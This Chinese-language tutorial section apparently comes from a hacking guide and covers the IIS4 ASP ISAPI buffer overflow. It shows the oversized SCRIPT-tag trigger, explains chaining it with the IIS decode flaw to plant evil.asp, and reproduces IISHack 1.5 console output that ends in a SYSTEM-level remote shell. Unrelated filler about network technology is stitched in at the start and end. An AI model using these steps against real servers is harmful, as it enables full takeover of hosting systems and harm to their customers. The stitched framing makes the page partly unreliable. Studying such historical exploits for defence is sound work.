網絡技術是從1990年代中期發展起來的新技術，它把互聯網上分散的資源融為有機整體，實現資源的全面共享和有機協作，使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享，網絡則被認為是互聯網發展的第三階段。

6.7 ASP ISAPI緩沖區溢出攻擊

    

6.7  ASP ISAPI緩沖區溢出攻擊

1. 漏洞介紹：

在IIS (Internet Information Server) ASP ISAPI文件解析機制中存在緩沖區溢出，它可以被用來獲得System級的訪問。

這是本地漏洞，入侵者只需要創建一個.asp文件作為犧牲品。當IIS解析它的時候導致inetinfo.exe緩沖區溢出，從而允許入侵者以System權限控制本地服務器。

那么，受此影響的將是任何運行多個客戶NT4 IIS4 Web服務器的網絡公司或Internet服務供應商。主要說來，任何可以更新網站的客戶(或攻擊者)上傳一個新的default.asp或anything.asp，都可以執行System執行代碼來完全控制目標服務器。入侵者可以對那臺服務器的其他任何客戶站點做任何事情，同時他們還可以安裝sniffer或破解口令以擴大他們在網絡中的戰果。

只要在網絡主機公司購買一個賬號，入侵者上傳evil.asp并用IE從自己的網站請求這個evil.asp，http://www.badguy.com/evil.asp，并且在那臺服務器上以System執行他的代碼。

這里是一個.asp文件導致NT4+IIS4的inetinfo.exe溢出的例子：

----start-cut-of-example.asp----

<SCRIPT LANGUAGE="[buffer]" RUNAT="Server">

</SCRIPT>

----start-cut-of-example.asp----

注意：

[buffer]是2220 字母或更多。

這個溢出可以利用，看下面的部分：

例如：

服務器有個寫入時不過濾Script命令的.asp來客登記/留言板系統系統。因此入侵者可以進入擁有【在此輸入你的信息：】文本框的頁面(或者更多)，他們只需要粘貼這些溢出代碼并提交信息(內含溢出信息)，就會導致IIS解析這個.asp文件時溢出，并執行他們的   代碼。

另外，入侵者可以將這個攻擊技術與最近的IIS解碼漏洞結合起來，使用cmd.exe echo自己的evil.asp內容到遠程系統，然后當入侵者請求evil.asp時，入侵者的代碼將被以System權限執行。事實上，他們已經構造了一個漏洞實例來表明這個.asp語言溢出，并且可以一起使用IIS解碼漏洞，危及任何沒有及時安裝補丁程序的Windows NT 4.0服務器。

由于這個攻擊悄無聲息，所以很有可能防火墻不能抵御類似的攻擊。

漏洞：

如何遠程攻擊系統呢？可以使用IIS解碼漏洞+.asp語言溢出漏洞。

如果不熟悉IIS解碼漏洞，最起碼它允許透過IIS以IUSR_MACHINE的權限遠程執行命令。因為入侵者可以通過cmd.exe執行命令，他們可以試著讓遠程主機連接到外部的FTP服務器獲取文件(似乎優先考慮IISHack)，但只能以IUSR_MACHINE的權限執行命令。這個漏洞通過使用IIS解碼漏洞工作，echo他們的.asp文件(以shell代碼結束，綁定cmd.exe到一個端口至一個遠程服務器，并請求訪問這個文件，然后導致inetinfo.exe溢出，將一個System級特權cmd.exe綁定到一個特殊端口)。在很多情況下入侵者應該擁有恰當的cmd.exe的訪問控制(這將不允許IUSR_MACHINE訪問)就像其他的安全措施一樣，因此他們應該知道這個漏洞在一個安全的系統里是不會工作的。然而，這僅僅是從理論上講的，大多數IIS服務器并沒有恰當的本地安全措施。該漏洞的利用具體如下：

C:\we are still hiring good programmers> iishack1.5.exe

IISHack Version 1.5

eEye Digital Security

http://www.eEye.com

Code By: Ryan Permeh & Marc Maiffret

eEye Digital Security takes no responsibility for use of this code.

It is for educational purposes only.

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969

IISHack Version 1.5

eEye Digital Security

http://www.eEye.com

Code By: Ryan Permeh & Marc Maiffret

eEye Digital Security takes no responsibility for use of this code.

It is for educational purposes only.

Attempting to find an executable directory...

Trying directory [scripts]

Executable directory found. [scripts]

Path to executable directory is [C:\Inetpub\scripts]

Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.

Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe

Sending the exploit...

Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you

should get a cmd prompt.

C:\> telnet www.[yourowncompany].com 6969

Trying www.[yourowncompany].com...

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

 

C:\WINNT\system32>whoami

NT AUTHORITY\SYSTEM

網絡的神奇作用吸引著越來越多的用戶加入其中，正因如此，網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......，各項技術都需要適時應勢，對應發展，這正是網絡迅速走向進步的催化劑。